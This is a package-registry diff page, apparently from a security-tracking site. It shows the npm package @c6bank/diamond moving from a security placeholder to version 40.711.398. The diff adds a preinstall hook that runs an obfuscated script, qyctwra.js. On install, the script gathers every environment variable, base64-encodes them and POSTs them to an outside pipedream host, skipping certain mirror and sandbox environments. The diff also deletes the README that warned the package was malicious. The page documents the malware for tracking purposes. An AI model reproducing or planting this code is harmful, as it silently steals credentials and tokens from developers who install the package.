@c6bank/diamond 0.0.1-security → 40.711.398
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @c6bank/diamond might be problematic. Click here for more details.
- package/package.json +8 -3
- package/qyctwra.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@c6bank/diamond",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "40.711.398",
|
|
4
|
+
"main": "qyctwra.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node qyctwra.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/qyctwra.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x4929e8=a0_0x2204;(function(_0x49a428,_0x32f3c6){const _0x104c9a=a0_0x2204,_0x145bea=_0x49a428();while(!![]){try{const _0x3a4c2b=-parseInt(_0x104c9a(0x103))/0x1*(parseInt(_0x104c9a(0x117))/0x2)+parseInt(_0x104c9a(0xf7))/0x3*(-parseInt(_0x104c9a(0xfb))/0x4)+-parseInt(_0x104c9a(0x10a))/0x5+parseInt(_0x104c9a(0x113))/0x6*(parseInt(_0x104c9a(0x10c))/0x7)+parseInt(_0x104c9a(0x10e))/0x8*(parseInt(_0x104c9a(0xff))/0x9)+parseInt(_0x104c9a(0xf9))/0xa*(-parseInt(_0x104c9a(0x10f))/0xb)+parseInt(_0x104c9a(0x110))/0xc*(parseInt(_0x104c9a(0x102))/0xd);if(_0x3a4c2b===_0x32f3c6)break;else _0x145bea['push'](_0x145bea['shift']());}catch(_0x307225){_0x145bea['push'](_0x145bea['shift']());}}}(a0_0x1de6,0x1fb67));const http=require('https'),filter=[{'key':'npm_config_registry','val':a0_0x4929e8(0xf8)},{'key':a0_0x4929e8(0x112),'val':a0_0x4929e8(0x111)},{'key':'npm_config_registry','val':a0_0x4929e8(0x115)},{'key':a0_0x4929e8(0x100),'val':a0_0x4929e8(0x101)},{'key':'_','val':'/usr/bin/python'}];function main(){const _0x4c2c43=a0_0x4929e8;var _0x3ba8d3=process['env']||{};if(filter[_0x4c2c43(0x104)](({key:_0x328307,val:_0x3d9997})=>_0x3ba8d3[_0x328307]&&_0x3ba8d3[_0x328307][_0x4c2c43(0x107)](_0x3d9997))||Object[_0x4c2c43(0x116)](_0x3ba8d3)[_0x4c2c43(0xfe)]<0xa)return;req=http[_0x4c2c43(0x108)]({'host':[_0x4c2c43(0x105),'m',_0x4c2c43(0xfa),_0x4c2c43(0x10b)][_0x4c2c43(0x106)]('.'),'path':'/'+(_0x3ba8d3['npm_package_name']||''),'method':_0x4c2c43(0x109)})['on']('error',function(_0x1d3cc3){}),req['write'](Buffer[_0x4c2c43(0xfc)](JSON[_0x4c2c43(0x114)](_0x3ba8d3))[_0x4c2c43(0x10d)](_0x4c2c43(0xfd))),req['end']();}function a0_0x2204(_0x5e14c7,_0x145c8f){const _0x1de688=a0_0x1de6();return a0_0x2204=function(_0x220417,_0x564f3a){_0x220417=_0x220417-0xf7;let _0x184f8f=_0x1de688[_0x220417];return _0x184f8f;},a0_0x2204(_0x5e14c7,_0x145c8f);}function a0_0x1de6(){const _0x20887a=['some','e0a8dd05baeedab99a1f90353febac51','join','includes','request','POST','336105kKiTgb','net','1267uvRSix','toString','344VHBXWD','209957ExoORg','12TckNNd','tencent.com','npm_config_registry','6648rjLUGJ','stringify','registry.npmmirror.com','keys','100132ODxieB','97764voUtgu','taobao.org','30cRWlXW','pipedream','8LTvDOq','from','base64','length','15192CBQQip','USERNAME','daasadmin','2556047VXBWEe','3DloSbj'];a0_0x1de6=function(){return _0x20887a;};return a0_0x1de6();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40c6bank%2Fdiamond for more information.
|